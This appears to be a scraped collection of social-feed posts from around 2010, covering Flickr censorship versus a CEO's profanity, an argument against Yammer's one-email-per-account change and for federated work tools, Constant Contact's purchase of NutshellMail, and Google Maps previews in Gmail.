So I guess it’s ok for a CEO to say “Fuck Off,” a phrase that surely is offensive to some. But it’s not ok for users of her site to do things like say publish photographs of paintings or plastic mannequins. Personally I don’t give a fcuk if Carol says fkuc as much as she fukin wants. But I think it’s a bit hypocritical for her to allow the censors at her Flickr site to censor things that are far less offensive. And it might be nice to have the fukcin picture above uncensored, thanks.
You can watch Carol tell me to “fuck off” below yourself if you’d like:
Both are equally awesome. - Alex Scoble
Give it a rest, Thomas - Glen, grandfather of FF
Consistent standards... - Johnny Worthington
Glen it's stupid that Flickr censors crap like this. It's not going to get any better if people just ignore it. - Thomas Hawk
Don't know which is more offensive (neither really to me), but there's very few cases where blanket censorship is good. - Joel Lovato
Neither is offensive. - MaryB, BrandingBroadOfFF
agree Mary and yet one is being censored by Yahoo. - Thomas Hawk
One I would let my kids see. One I wouldn't. - Jesse Stay
Yammer has decided that they are going to go down the old Basecamp path, and force people who work with different companies to have separate logins:
via email
Dear Stowe,
We want to make you aware of a change to Yammer that will have an impact on you. You currently have more than one email address registered to your Yammer account. We've decided to move to a one-email-per-account model. This means that we will soon remove secondary email address(es) from your account.
Why are we doing this?
As Yammer evaluates its plans for future product features, we've realized that allowing users to have more than one email address linked to their account could result in potential problems. For example, admins from different networks might seek to apply conflicting settings to an account which is in both networks. There could also be confusion between work and personal Yammer accounts. We believe that cleanly separating Yammer accounts based on one email address per account is the best way to avoid these problems from occurring in the future.
How does this affect you?
- We will create a separate Yammer account for each of the following company email addresses that you have: stowe@js-kit.com and stowe@ninety10group.com
- When you want to switch between these Yammer accounts you must first log out and then log in with one of your other email addresses.
- Your same password will be securely copied to each of your new accounts.
- Soon, our desktop and iPhone applications will allow you to be logged into more than one account at the same time. Just register each account on the application and you will be able to toggle between accounts.
If you have any questions or concerns, please contact help@yammer.com
We appreciate your patience, and apologize for any inconvenience that this change causes you.
Thanks for using Yammer,
The Yammer Team
This is a particularly bad move. First of all, it will lead to the same Federation of Work problems that I wrote about years ago vis-a-vis Basecamp:
Basecamp and The Federation Of Work
I have run up against what I think is a basic flaw in the Basecamp model.
Many times in the past few months, I have started a project up with a group, or groups, who like me are already using Basecamp. The problem that arises: Whose Basecamp implementation to use?
I would, of course, rather manage projects that I am involved with in my own Basecamp instance, while the others have the same perspective. But what happens, quickly, is that I have a bunch of memberships in other Basecamp projects, which do not collate into a coherent single view.
What's missing is a fundamental insight: the federation of work.
Basecamp lacks the notion of federating project work. While I can invite my pal, Greg Narain, to join a project I am running, Basecamp is only willing to consider Greg as another individual, not as the owner of his own Basecamp instance. As a result, Greg must login to my instance to participate, and the status of the project does not show up on his dashboard.
The solution? 37 Signals should rework their participation model to reflect their new-found success: there are thousands of Basecamp users out there, and more of us will be running into this limitation. More important, perhaps, is that a federated model more accurately reflects the nature of the world. I am involved in a dozen or so projects, and I would like to have a single, coherent view of what's going on across the board, as do all of my partners-in-crime.
Certainly, a single company still needs to be the administrator for each Basecamp project, but that doesn't mean that we need to login at ten different instances everyday.
Basecamp should look at the federation model of Jabber and other successful bottom-up, federated tools. Within Jabber, I can login to my local server, and IM with any other trusted server in the world. The servers simply have to establish a trust relationship. In the Basecamp world, I should be able to invite Greg to participate in a project, and when he agrees, he should be able to simply point at his own Basecamp instance, rather than having to create a brand new, easily forgotten login.
At any rate, Jason and company are well-known for rejecting new features, but this is more than that, this is a fundamental need that should have been foreseen from the start. And, in a way, it's just another indicator of the success that the product enjoys.
When I wrote that in March 2006 it led to an argument with Jason Fried of 37signals, who basically said I was an edge case. I pointed out that success would lead to more of this sort of use -- individuals working with many project groups in many companies. I said he would have to fix this flaw, and years later they hacked an afterthought onto Basecamp to make it easier to switch accounts.
Yammer is headed down the same cul-de-sac. This is a bad move, and one that irks me personally since I sketched out a vision of federated businesses collaborating through Yammer a year ago to the CEO, David Sacks. Obviously, I didn't make the case persuasively enough.
Consider this idea. Imagine tens of thousands of companies that are managing work using a service like Yammer. Imagine if a company, AdjectiveNoun, could post a request for proposal, and distribute that to all companies and individuals that are following the company. Responses to the RFP could be directed to a defined context in AdjectiveNoun's Yammer implementation, and would be streamed to AdjectiveNoun staff.
I think this is a breakthrough idea, and the first company to do this well will explode.
But you can't get there without a federated model of work, and a global namespace. So Yammer is going to ultimately unjigger this mess they are creating. Probably not until some upstart comes along to upset things.
Maybe I'll see one this week at Techcrunch Disrupt, who knows?
Email marketing company Constant Contact has acquired NutshellMail, a fbFund-backed startup that provides a web-based service letting users send and receive their messages from social networks, such as Facebook, LinkedIn, MySpace and Twitter, in their email inbox.
Founded in 2007, NutshellMail was one of twenty startups incubated within the 2009 class of fbFund REV, Facebook’s joint program with Accel Partners and Founders Fund aimed to help foster quality applications on Facebook Platform.
Constant Contact will use NutshellMail to complement its email marketing, event marketing, and online survey tools for small businesses and nonprofits. Constant Contact also announced it will open a Bay Area office.

Slap a Map Across Your Gmail or Buzz - (jeff)isageek
Slap a Map Across Your Gmail or Buzz - Kol Tregaskes
"Google announced today that it has enabled a Google Maps preview in both Gmail and Google Buzz. Now, instead of pasting a Google Map into an email you send, any Google Maps URL and any U.S. address (for the time being) you enclose will automatically come with a map embedded." - Kol Tregaskes
yes, US only for now :( - georgeker
Ah. :-( - Kol Tregaskes